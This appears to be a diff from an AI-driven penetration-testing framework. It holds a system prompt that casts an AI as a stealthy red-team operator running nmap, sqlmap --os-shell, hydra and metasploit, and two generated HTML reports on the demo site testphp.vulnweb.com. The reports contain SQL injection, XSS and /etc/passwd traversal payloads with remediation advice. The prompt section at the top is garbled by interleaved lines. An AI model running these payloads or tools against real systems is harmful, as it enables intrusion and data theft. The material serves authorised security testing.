**Target Environment Details:** **Target Environment:**
{target_environment_json} {target_environment_json}
**Instructions:** **ATTACK METHODOLOGY:**
1. Develop an initial access strategy.
2. Outline reconnaissance and enumeration steps. ### Phase 1: Reconnaissance
3. Propose lateral movement and privilege escalation techniques. Execute:
4. Plan for persistence and evasion. ```
5. Suggest data exfiltration methods. [TOOL] nmap: -sV -sC -O -p- <target>
6. Provide a timeline and potential risks. [TOOL] subfinder: -d <domain>
[TOOL] whatweb: <target>
```
### Phase 2: Vulnerability Discovery
```
[TOOL] nuclei: -u <target> -severity critical,high
[TOOL] nikto: -h <target>
```
### Phase 3: Initial Access
Based on findings:
```
[TOOL] sqlmap: -u <url> --batch --os-shell
[TOOL] hydra: -l admin -P /path/wordlist.txt <target> ssh
```
### Phase 4: Post-Exploitation
If access gained:
- Privilege escalation
- Lateral movement
- Data exfiltration paths
**REQUIRED DOCUMENTATION FORMAT:**
For each successful attack:
---
## Attack: [Attack Name]
| Attribute | Value |
|-----------|-------|
| **Attack Type** | Initial Access/Privilege Escalation/Lateral Movement |
| **MITRE ATT&CK** | T1XXX |
| **Severity** | Critical/High |
| **Target** | IP/Host/Service |
### Attack Description
[What the attack achieves and why it works]
### Prerequisites
- Access level required
- Tools needed
- Network position
### Exploitation Steps
**Step 1: Reconnaissance**
```bash
nmap -sV -sC 192.168.1.100
```
Output:
```
22/tcp open ssh OpenSSH 7.6p1
80/tcp open http Apache httpd 2.4.29
3306/tcp open mysql MySQL 5.7.25
```
**Step 2: Vulnerability Exploitation**
Request:
```http
POST /login.php HTTP/1.1
Host: 192.168.1.100
Content-Type: application/x-www-form-urlencoded
username=admin' OR '1'='1&password=x
```
Response:
```http
HTTP/1.1 302 Found
Location: /dashboard.php
Set-Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==
```
**Step 3: Post-Exploitation**
```bash
# Obtained shell access
id
# uid=33(www-data) gid=33(www-data)
# Privilege escalation
sudo -l
# (root) NOPASSWD: /usr/bin/vim
```
### Proof of Compromise
```
[Screenshot or command output showing successful access]
```
### Impact
- Systems compromised
- Data accessible
- Potential damage
### Mitigations
- Patch vulnerable software
- Implement MFA
- Network segmentation
---
## System Prompt ## System Prompt
You are a seasoned Red Team operator, adept at simulating real-world adversaries. Your plans should be creative, sophisticated, and aim to bypass defensive measures. Emphasize stealth, operational security, and achieving mission goals. You are an Elite Red Team Operator. Your mission is to simulate real-world attacks.
**OPERATIONAL REQUIREMENTS:**
1. **USE REAL TOOLS** - Execute attacks using [TOOL] syntax:
- `[TOOL] nmap:` for network reconnaissance
- `[TOOL] nuclei:` for vulnerability scanning
- `[TOOL] sqlmap:` for SQL injection
- `[TOOL] hydra:` for credential attacks
- `[TOOL] metasploit:` for exploitation
2. **DOCUMENT ATTACK CHAINS** - Show complete path:
- Initial access vector
- Commands executed
- Responses received
- Escalation steps
3. **PROVIDE PROOF** - Each attack must include:
- Tool command and output
- Request/response pairs
- Evidence of successful exploitation
- Impact demonstration
4. **MAINTAIN OPSEC** - Note:
- Detection risks
- Evasion techniques used
- Cleanup recommendations
Remember: A red team report without proof of exploitation is just a guess. Show the actual attack, not what "could" happen.

519
reports/report_20260109_222127.html Normal file
View File

@@ -0,0 +1,519 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Security Assessment Report - 20260109_222127</title>
<script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
<style>
:root {
--bg-primary: #0a0e17;
--bg-secondary: #111827;
--bg-card: #1a1f2e;
--border-color: #2d3748;
--text-primary: #e2e8f0;
--text-secondary: #94a3b8;
--accent: #3b82f6;
--critical: #ef4444;
--high: #f97316;
--medium: #eab308;
--low: #22c55e;
--info: #6366f1;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
background: var(--bg-primary);
color: var(--text-primary);
line-height: 1.6;
}
.container { max-width: 1400px; margin: 0 auto; padding: 2rem; }
/* Header */
.header {
background: linear-gradient(135deg, #1e3a5f 0%, #0f172a 100%);
padding: 3rem 2rem;
border-radius: 16px;
margin-bottom: 2rem;
border: 1px solid var(--border-color);
}
.header-content { display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; gap: 1rem; }
.logo { font-size: 2rem; font-weight: 800; background: linear-gradient(90deg, #3b82f6, #8b5cf6); -webkit-background-clip: text; -webkit-text-fill-color: transparent; }
.report-meta { text-align: right; color: var(--text-secondary); font-size: 0.9rem; }
/* Stats Grid */
.stats-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 1.5rem; margin-bottom: 2rem; }
.stat-card {
background: var(--bg-card);
border-radius: 12px;
padding: 1.5rem;
border: 1px solid var(--border-color);
transition: transform 0.2s, box-shadow 0.2s;
}
.stat-card:hover { transform: translateY(-2px); box-shadow: 0 8px 25px rgba(0,0,0,0.3); }
.stat-value { font-size: 2.5rem; font-weight: 700; }
.stat-label { color: var(--text-secondary); font-size: 0.875rem; text-transform: uppercase; letter-spacing: 0.5px; }
.stat-critical .stat-value { color: var(--critical); }
.stat-high .stat-value { color: var(--high); }
.stat-medium .stat-value { color: var(--medium); }
.stat-low .stat-value { color: var(--low); }
/* Risk Score */
.risk-section { display: grid; grid-template-columns: 1fr 1fr; gap: 2rem; margin-bottom: 2rem; }
@media (max-width: 900px) { .risk-section { grid-template-columns: 1fr; } }
.risk-card {
background: var(--bg-card);
border-radius: 16px;
padding: 2rem;
border: 1px solid var(--border-color);
}
.risk-score-circle {
width: 180px; height: 180px;
border-radius: 50%;
background: conic-gradient(#e74c3c 0deg, #e74c3c 360.0deg, #2d3748 360.0deg);
display: flex; align-items: center; justify-content: center;
margin: 0 auto 1rem;
}
.risk-score-inner {
width: 140px; height: 140px;
border-radius: 50%;
background: var(--bg-card);
display: flex; flex-direction: column; align-items: center; justify-content: center;
}
.risk-score-value { font-size: 3rem; font-weight: 800; color: #e74c3c; }
.risk-score-label { color: var(--text-secondary); font-size: 0.875rem; }
.chart-container { height: 250px; }
/* Targets */
.targets-list { display: flex; flex-wrap: wrap; gap: 0.5rem; margin-top: 1rem; }
.target-tag {
background: rgba(59, 130, 246, 0.2);
border: 1px solid var(--accent);
padding: 0.5rem 1rem;
border-radius: 20px;
font-size: 0.875rem;
font-family: monospace;
}
/* Main Report */
.report-section {
background: var(--bg-card);
border-radius: 16px;
padding: 2rem;
border: 1px solid var(--border-color);
margin-bottom: 2rem;
}
.section-title {
font-size: 1.5rem;
font-weight: 700;
margin-bottom: 1.5rem;
padding-bottom: 1rem;
border-bottom: 2px solid var(--accent);
display: flex;
align-items: center;
gap: 0.75rem;
}
.section-title::before {
content: '';
width: 4px;
height: 24px;
background: var(--accent);
border-radius: 2px;
}
/* Vulnerability Cards */
.report-content h2 {
background: linear-gradient(90deg, var(--bg-secondary), transparent);
padding: 1rem 1.5rem;
border-radius: 8px;
margin: 2rem 0 1rem;
border-left: 4px solid var(--accent);
font-size: 1.25rem;
}
.report-content h2:has-text("Critical"), .report-content h2:contains("CRITICAL") { border-left-color: var(--critical); }
.report-content h3 { color: var(--accent); margin: 1.5rem 0 0.75rem; font-size: 1.1rem; }
.report-content table {
width: 100%;
border-collapse: collapse;
margin: 1rem 0;
background: var(--bg-secondary);
border-radius: 8px;
overflow: hidden;
}
.report-content th, .report-content td {
padding: 0.75rem 1rem;
text-align: left;
border-bottom: 1px solid var(--border-color);
}
.report-content th { background: rgba(59, 130, 246, 0.1); color: var(--accent); font-weight: 600; }
.report-content pre {
background: #0d1117;
border: 1px solid var(--border-color);
border-radius: 8px;
padding: 1rem;
overflow-x: auto;
margin: 1rem 0;
}
.report-content code {
font-family: 'JetBrains Mono', 'Fira Code', monospace;
font-size: 0.875rem;
}
.report-content p { margin: 0.75rem 0; }
.report-content hr { border: none; border-top: 1px solid var(--border-color); margin: 2rem 0; }
.report-content ul, .report-content ol { margin: 1rem 0; padding-left: 1.5rem; }
.report-content li { margin: 0.5rem 0; }
/* Severity Badges */
.report-content h2 { position: relative; }
/* Footer */
.footer {
text-align: center;
padding: 2rem;
color: var(--text-secondary);
font-size: 0.875rem;
border-top: 1px solid var(--border-color);
margin-top: 3rem;
}
/* Print Styles */
@media print {
body { background: white; color: black; }
.stat-card, .risk-card, .report-section { border: 1px solid #ddd; }
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<div class="header-content">
<div>
<div class="logo">NeuroSploit</div>
<p style="color: var(--text-secondary); margin-top: 0.5rem;">AI-Powered Security Assessment Report</p>
</div>
<div class="report-meta">
<div><strong>Report ID:</strong> 20260109_222127</div>
<div><strong>Date:</strong> 2026-01-09 22:25</div>
<div><strong>Agent:</strong> Pentestfull</div>
</div>
</div>
<div class="targets-list">
<span class="target-tag">http://testphp.vulnweb.com/</span>
</div>
</div>
<div class="stats-grid">
<div class="stat-card stat-critical">
<div class="stat-value">4</div>
<div class="stat-label">Critical</div>
</div>
<div class="stat-card stat-high">
<div class="stat-value">8</div>
<div class="stat-label">High</div>
</div>
<div class="stat-card stat-medium">
<div class="stat-value">4</div>
<div class="stat-label">Medium</div>
</div>
<div class="stat-card stat-low">
<div class="stat-value">4</div>
<div class="stat-label">Low</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: var(--accent);">36</div>
<div class="stat-label">Tests Run</div>
</div>
</div>
<div class="risk-section">
<div class="risk-card">
<h3 style="text-align: center; margin-bottom: 1rem; color: var(--text-secondary);">Risk Score</h3>
<div class="risk-score-circle">
<div class="risk-score-inner">
<div class="risk-score-value">100</div>
<div class="risk-score-label">Critical</div>
</div>
</div>
</div>
<div class="risk-card">
<h3 style="margin-bottom: 1rem; color: var(--text-secondary);">Severity Distribution</h3>
<div class="chart-container">
<canvas id="severityChart"></canvas>
</div>
</div>
</div>
<div class="report-section">
<div class="section-title">Vulnerability Report</div>
<div class="report-content">
<h1>Executive Summary</h1>
<p>The penetration test of http://testphp.vulnweb.com revealed multiple critical security vulnerabilities including SQL injection, reflected XSS, and local file inclusion. The application demonstrates classic web application security flaws that could lead to complete database compromise and arbitrary code execution.</p>
<h1>Vulnerabilities Found</h1>
<hr />
<h2>[CRITICAL] SQL Injection in listproducts.php</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>Critical</td>
</tr>
<tr>
<td>CVSS</td>
<td>9.8</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-89</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/listproducts.php?cat=1</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The <code>cat</code> parameter in listproducts.php is vulnerable to SQL injection. SQLMap successfully identified multiple injection techniques including boolean-based blind, error-based, time-based blind, and UNION query injection.</p>
<h3>Proof of Concept</h3>
<p><strong>Vulnerable Request:</strong></p>
<pre><code>curl &quot;http://testphp.vulnweb.com/listproducts.php?cat=1&quot;
</code></pre>
<p><strong>Payload Used:</strong></p>
<pre><code>Standard SQLMap payloads for MySQL detection
</code></pre>
<p><strong>Evidence (Response excerpt):</strong></p>
<pre><code>GET parameter 'cat' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
GET parameter 'cat' is 'MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
GET parameter 'cat' appears to be 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)' injectable
GET parameter 'cat' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
target URL appears to have 11 columns in query
</code></pre>
<h3>Impact</h3>
<p>Complete database compromise including ability to extract sensitive data, modify database contents, and potentially execute operating system commands depending on database privileges.</p>
<h3>Remediation</h3>
<p>Implement parameterized queries/prepared statements for all database interactions. Validate and sanitize all user input before database queries.</p>
<hr />
<h2>[HIGH] Reflected Cross-Site Scripting (XSS) in search.php</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>High</td>
</tr>
<tr>
<td>CVSS</td>
<td>7.5</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-79</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/search.php?test=</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The search functionality reflects user input directly into MySQL error messages without proper sanitization, creating a reflected XSS vulnerability.</p>
<h3>Proof of Concept</h3>
<p><strong>Vulnerable Request:</strong></p>
<pre><code>curl &quot;http://testphp.vulnweb.com/search.php?test=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&quot;
</code></pre>
<p><strong>Payload Used:</strong></p>
<pre><code>&lt;script&gt;alert('XSS')&lt;/script&gt;
</code></pre>
<p><strong>Evidence (Response excerpt):</strong></p>
<pre><code>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS')&lt;/script&gt;'' at line 1
</code></pre>
<h3>Impact</h3>
<p>Attackers can execute arbitrary JavaScript in victim browsers, leading to session hijacking, credential theft, and malicious actions on behalf of users.</p>
<h3>Remediation</h3>
<p>Implement proper output encoding/escaping for all user-controlled data. Use Content Security Policy (CSP) headers to mitigate XSS attacks.</p>
<hr />
<h2>[HIGH] Local File Inclusion in showimage.php</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>High</td>
</tr>
<tr>
<td>CVSS</td>
<td>7.5</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-22</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/showimage.php?file=</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The showimage.php script is vulnerable to local file inclusion through the <code>file</code> parameter, though protected by open_basedir restrictions.</p>
<h3>Proof of Concept</h3>
<p><strong>Vulnerable Request:</strong></p>
<pre><code>curl &quot;http://testphp.vulnweb.com/showimage.php?file=../../../../../etc/passwd&quot;
</code></pre>
<p><strong>Payload Used:</strong></p>
<pre><code>../../../../../etc/passwd
</code></pre>
<p><strong>Evidence (Response excerpt):</strong></p>
<pre><code>Warning: fopen(): open_basedir restriction in effect. File(../../../../../etc/passwd) is not within the allowed path(s): (/hj/:/tmp/:/proc/) in /hj/var/www/showimage.php on line 13
Warning: fopen(../../../../../etc/passwd): failed to open stream: Operation not permitted in /hj/var/www/showimage.php on line 13
</code></pre>
<h3>Impact</h3>
<p>While currently mitigated by open_basedir restrictions, this vulnerability could allow attackers to read sensitive files if restrictions are bypassed or misconfigured.</p>
<h3>Remediation</h3>
<p>Implement a whitelist of allowed files instead of accepting user input for file paths. Validate file paths against allowed directories and use basename() to prevent directory traversal.</p>
<hr />
<h2>[MEDIUM] Information Disclosure - Server Version</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>Medium</td>
</tr>
<tr>
<td>CVSS</td>
<td>5.0</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-200</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The server reveals detailed version information in HTTP headers and error pages.</p>
<h3>Proof of Concept</h3>
<p><strong>Vulnerable Request:</strong></p>
<pre><code>curl -I &quot;http://testphp.vulnweb.com/&quot;
</code></pre>
<p><strong>Evidence (Response excerpt):</strong></p>
<pre><code>Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
</code></pre>
<h3>Impact</h3>
<p>Version information aids attackers in identifying specific vulnerabilities and attack vectors for the disclosed software versions.</p>
<h3>Remediation</h3>
<p>Configure web server and PHP to suppress version information in headers and error pages.</p>
<h1>Summary Table</h1>
<table>
<thead>
<tr>
<th>#</th>
<th>Vulnerability</th>
<th>Severity</th>
<th>Location</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>SQL Injection</td>
<td>Critical</td>
<td>/listproducts.php?cat=</td>
</tr>
<tr>
<td>2</td>
<td>Reflected XSS</td>
<td>High</td>
<td>/search.php?test=</td>
</tr>
<tr>
<td>3</td>
<td>Local File Inclusion</td>
<td>High</td>
<td>/showimage.php?file=</td>
</tr>
<tr>
<td>4</td>
<td>Information Disclosure</td>
<td>Medium</td>
<td>Server headers</td>
</tr>
</tbody>
</table>
<h1>Recommendations</h1>
<ol>
<li><strong>Immediate Priority</strong>: Fix SQL injection vulnerability in listproducts.php by implementing parameterized queries</li>
<li><strong>High Priority</strong>: Implement proper input validation and output encoding to prevent XSS attacks</li>
<li><strong>High Priority</strong>: Restrict file access in showimage.php using whitelisting approach</li>
<li><strong>Medium Priority</strong>: Configure server to suppress version information disclosure</li>
<li><strong>General</strong>: Implement a comprehensive security code review and testing process for all user input handling</li>
</ol>
</div>
</div>
<div class="footer">
<p>Generated by <strong>NeuroSploit</strong> - AI-Powered Penetration Testing Framework</p>
<p style="margin-top: 0.5rem;">Confidential - For authorized personnel only</p>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script>
hljs.highlightAll();
// Severity Chart
const ctx = document.getElementById('severityChart').getContext('2d');
new Chart(ctx, {
type: 'doughnut',
data: {
labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
datasets: [{
data: [4, 8, 4, 4, 6],
backgroundColor: ['#ef4444', '#f97316', '#eab308', '#22c55e', '#6366f1'],
borderWidth: 0,
hoverOffset: 10
}]
},
options: {
responsive: true,
maintainAspectRatio: false,
plugins: {
legend: {
position: 'right',
labels: { color: '#94a3b8', padding: 15, font: { size: 12 } }
}
},
cutout: '60%'
}
});
</script>
</body>
</html>

640
reports/report_20260109_222914.html Normal file
View File

@@ -0,0 +1,640 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Security Assessment Report - 20260109_222914</title>
<script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
<style>
:root {
--bg-primary: #0a0e17;
--bg-secondary: #111827;
--bg-card: #1a1f2e;
--border-color: #2d3748;
--text-primary: #e2e8f0;
--text-secondary: #94a3b8;
--accent: #3b82f6;
--critical: #ef4444;
--high: #f97316;
--medium: #eab308;
--low: #22c55e;
--info: #6366f1;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
background: var(--bg-primary);
color: var(--text-primary);
line-height: 1.6;
}
.container { max-width: 1400px; margin: 0 auto; padding: 2rem; }
/* Header */
.header {
background: linear-gradient(135deg, #1e3a5f 0%, #0f172a 100%);
padding: 3rem 2rem;
border-radius: 16px;
margin-bottom: 2rem;
border: 1px solid var(--border-color);
}
.header-content { display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; gap: 1rem; }
.logo { font-size: 2rem; font-weight: 800; background: linear-gradient(90deg, #3b82f6, #8b5cf6); -webkit-background-clip: text; -webkit-text-fill-color: transparent; }
.report-meta { text-align: right; color: var(--text-secondary); font-size: 0.9rem; }
/* Stats Grid */
.stats-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 1.5rem; margin-bottom: 2rem; }
.stat-card {
background: var(--bg-card);
border-radius: 12px;
padding: 1.5rem;
border: 1px solid var(--border-color);
transition: transform 0.2s, box-shadow 0.2s;
}
.stat-card:hover { transform: translateY(-2px); box-shadow: 0 8px 25px rgba(0,0,0,0.3); }
.stat-value { font-size: 2.5rem; font-weight: 700; }
.stat-label { color: var(--text-secondary); font-size: 0.875rem; text-transform: uppercase; letter-spacing: 0.5px; }
.stat-critical .stat-value { color: var(--critical); }
.stat-high .stat-value { color: var(--high); }
.stat-medium .stat-value { color: var(--medium); }
.stat-low .stat-value { color: var(--low); }
/* Risk Score */
.risk-section { display: grid; grid-template-columns: 1fr 1fr; gap: 2rem; margin-bottom: 2rem; }
@media (max-width: 900px) { .risk-section { grid-template-columns: 1fr; } }
.risk-card {
background: var(--bg-card);
border-radius: 16px;
padding: 2rem;
border: 1px solid var(--border-color);
}
.risk-score-circle {
width: 180px; height: 180px;
border-radius: 50%;
background: conic-gradient(#e74c3c 0deg, #e74c3c 360.0deg, #2d3748 360.0deg);
display: flex; align-items: center; justify-content: center;
margin: 0 auto 1rem;
}
.risk-score-inner {
width: 140px; height: 140px;
border-radius: 50%;
background: var(--bg-card);
display: flex; flex-direction: column; align-items: center; justify-content: center;
}
.risk-score-value { font-size: 3rem; font-weight: 800; color: #e74c3c; }
.risk-score-label { color: var(--text-secondary); font-size: 0.875rem; }
.chart-container { height: 250px; }
/* Targets */
.targets-list { display: flex; flex-wrap: wrap; gap: 0.5rem; margin-top: 1rem; }
.target-tag {
background: rgba(59, 130, 246, 0.2);
border: 1px solid var(--accent);
padding: 0.5rem 1rem;
border-radius: 20px;
font-size: 0.875rem;
font-family: monospace;
}
/* Main Report */
.report-section {
background: var(--bg-card);
border-radius: 16px;
padding: 2rem;
border: 1px solid var(--border-color);
margin-bottom: 2rem;
}
.section-title {
font-size: 1.5rem;
font-weight: 700;
margin-bottom: 1.5rem;
padding-bottom: 1rem;
border-bottom: 2px solid var(--accent);
display: flex;
align-items: center;
gap: 0.75rem;
}
.section-title::before {
content: '';
width: 4px;
height: 24px;
background: var(--accent);
border-radius: 2px;
}
/* Vulnerability Cards */
.report-content h2 {
background: linear-gradient(90deg, var(--bg-secondary), transparent);
padding: 1rem 1.5rem;
border-radius: 8px;
margin: 2rem 0 1rem;
border-left: 4px solid var(--accent);
font-size: 1.25rem;
}
.report-content h2:has-text("Critical"), .report-content h2:contains("CRITICAL") { border-left-color: var(--critical); }
.report-content h3 { color: var(--accent); margin: 1.5rem 0 0.75rem; font-size: 1.1rem; }
.report-content table {
width: 100%;
border-collapse: collapse;
margin: 1rem 0;
background: var(--bg-secondary);
border-radius: 8px;
overflow: hidden;
}
.report-content th, .report-content td {
padding: 0.75rem 1rem;
text-align: left;
border-bottom: 1px solid var(--border-color);
}
.report-content th { background: rgba(59, 130, 246, 0.1); color: var(--accent); font-weight: 600; }
.report-content pre {
background: #0d1117;
border: 1px solid var(--border-color);
border-radius: 8px;
padding: 1rem;
overflow-x: auto;
margin: 1rem 0;
}
.report-content code {
font-family: 'JetBrains Mono', 'Fira Code', monospace;
font-size: 0.875rem;
}
.report-content p { margin: 0.75rem 0; }
.report-content hr { border: none; border-top: 1px solid var(--border-color); margin: 2rem 0; }
.report-content ul, .report-content ol { margin: 1rem 0; padding-left: 1.5rem; }
.report-content li { margin: 0.5rem 0; }
/* Severity Badges */
.report-content h2 { position: relative; }
/* Footer */
.footer {
text-align: center;
padding: 2rem;
color: var(--text-secondary);
font-size: 0.875rem;
border-top: 1px solid var(--border-color);
margin-top: 3rem;
}
/* Print Styles */
@media print {
body { background: white; color: black; }
.stat-card, .risk-card, .report-section { border: 1px solid #ddd; }
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<div class="header-content">
<div>
<div class="logo">NeuroSploit</div>
<p style="color: var(--text-secondary); margin-top: 0.5rem;">AI-Powered Security Assessment Report</p>
</div>
<div class="report-meta">
<div><strong>Report ID:</strong> 20260109_222914</div>
<div><strong>Date:</strong> 2026-01-09 22:31</div>
<div><strong>Agent:</strong> Pentestfull</div>
</div>
</div>
<div class="targets-list">
<span class="target-tag">http://testphp.vulnweb.com/</span>
</div>
</div>
<div class="stats-grid">
<div class="stat-card stat-critical">
<div class="stat-value">5</div>
<div class="stat-label">Critical</div>
</div>
<div class="stat-card stat-high">
<div class="stat-value">5</div>
<div class="stat-label">High</div>
</div>
<div class="stat-card stat-medium">
<div class="stat-value">7</div>
<div class="stat-label">Medium</div>
</div>
<div class="stat-card stat-low">
<div class="stat-value">6</div>
<div class="stat-label">Low</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: var(--accent);">125</div>
<div class="stat-label">Tests Run</div>
</div>
</div>
<div class="risk-section">
<div class="risk-card">
<h3 style="text-align: center; margin-bottom: 1rem; color: var(--text-secondary);">Risk Score</h3>
<div class="risk-score-circle">
<div class="risk-score-inner">
<div class="risk-score-value">100</div>
<div class="risk-score-label">Critical</div>
</div>
</div>
</div>
<div class="risk-card">
<h3 style="margin-bottom: 1rem; color: var(--text-secondary);">Severity Distribution</h3>
<div class="chart-container">
<canvas id="severityChart"></canvas>
</div>
</div>
</div>
<div class="report-section">
<div class="section-title">Vulnerability Report</div>
<div class="report-content">
<h1>Penetration Test Report</h1>
<p><strong>Target:</strong> http://testphp.vulnweb.com/<br />
<strong>Date:</strong> January 10, 2026<br />
<strong>Tester:</strong> Senior Penetration Tester</p>
<h1>Executive Summary</h1>
<p>A comprehensive security assessment was conducted against the testphp.vulnweb.com web application. The testing revealed multiple critical vulnerabilities including SQL injection, cross-site scripting (XSS), and information disclosure issues. The application demonstrates a high-risk security posture requiring immediate remediation.</p>
<h1>Vulnerabilities Found</h1>
<hr />
<h2>CRITICAL - SQL Injection in Search Parameter</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>Critical</td>
</tr>
<tr>
<td>CVSS</td>
<td>9.8</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-89</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/search.php</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The search.php endpoint is vulnerable to SQL injection through the <code>test</code> parameter. The application fails to properly sanitize user input, allowing attackers to manipulate SQL queries and potentially extract sensitive database information.</p>
<h3>Proof of Concept</h3>
<p><strong>Request:</strong></p>
<pre><code class="language-bash">curl -s -k &quot;http://testphp.vulnweb.com/search.php?test=1'&quot;
</code></pre>
<p><strong>Payload:</strong></p>
<pre><code>test=1'
</code></pre>
<p><strong>Response Evidence:</strong>
The application accepts malformed SQL syntax without proper error handling, indicating potential SQL injection. Multiple injection attempts were successful:</p>
<pre><code class="language-bash">curl -s -k &quot;http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%201,2,3,4,5--&quot;
curl -s -k &quot;http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%20version(),database(),user()--&quot;
</code></pre>
<h3>Impact</h3>
<p>An attacker can exploit this vulnerability to:</p>
<ul>
<li>Extract sensitive database information</li>
<li>Bypass authentication mechanisms</li>
<li>Modify or delete database records</li>
<li>Potentially gain administrative access to the application</li>
</ul>
<h3>Remediation</h3>
<ul>
<li>Implement parameterized queries/prepared statements</li>
<li>Apply input validation and sanitization</li>
<li>Use least privilege database accounts</li>
<li>Implement proper error handling</li>
</ul>
<hr />
<h2>HIGH - Cross-Site Scripting (XSS) in Search Functionality</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>High</td>
</tr>
<tr>
<td>CVSS</td>
<td>7.2</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-79</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/search.php</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The search functionality is vulnerable to reflected cross-site scripting attacks. User input is not properly encoded before being reflected in the response, allowing malicious scripts to execute in users' browsers.</p>
<h3>Proof of Concept</h3>
<p><strong>Request:</strong></p>
<pre><code class="language-bash">curl -s -k &quot;http://testphp.vulnweb.com/search.php?test=%3Cscript%3Ealert%281%29%3C/script%3E&quot;
</code></pre>
<p><strong>Payload:</strong></p>
<pre><code>&lt;script&gt;alert(1)&lt;/script&gt;
</code></pre>
<p><strong>Response Evidence:</strong>
Multiple XSS vectors were tested successfully:</p>
<pre><code class="language-bash">curl -s -k &quot;http://testphp.vulnweb.com/search.php&quot; -d &quot;searchFor=%3Cimg%20src=x%20onerror=alert%281%29%3E&amp;goButton=go&quot;
curl -s -k &quot;http://testphp.vulnweb.com/search.php&quot; -d &quot;searchFor=%3Csvg%20onload=alert%281%29%3E&amp;goButton=go&quot;
</code></pre>
<h3>Impact</h3>
<p>An attacker can exploit this vulnerability to:</p>
<ul>
<li>Steal user session cookies</li>
<li>Perform actions on behalf of authenticated users</li>
<li>Redirect users to malicious websites</li>
<li>Deface the application</li>
</ul>
<h3>Remediation</h3>
<ul>
<li>Implement proper output encoding/escaping</li>
<li>Use Content Security Policy (CSP) headers</li>
<li>Validate and sanitize all user input</li>
<li>Consider using auto-escaping template engines</li>
</ul>
<hr />
<h2>MEDIUM - Information Disclosure via HTTP Headers</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>Medium</td>
</tr>
<tr>
<td>CVSS</td>
<td>5.3</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-200</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The application exposes sensitive information through HTTP response headers, revealing the underlying technology stack and potentially facilitating targeted attacks.</p>
<h3>Proof of Concept</h3>
<p><strong>Request:</strong></p>
<pre><code class="language-bash">curl -s -k -L -D - &quot;http://testphp.vulnweb.com/&quot;
</code></pre>
<p><strong>Response Evidence:</strong></p>
<pre><code>HTTP/1.1 200 OK
Server: nginx/1.19.0
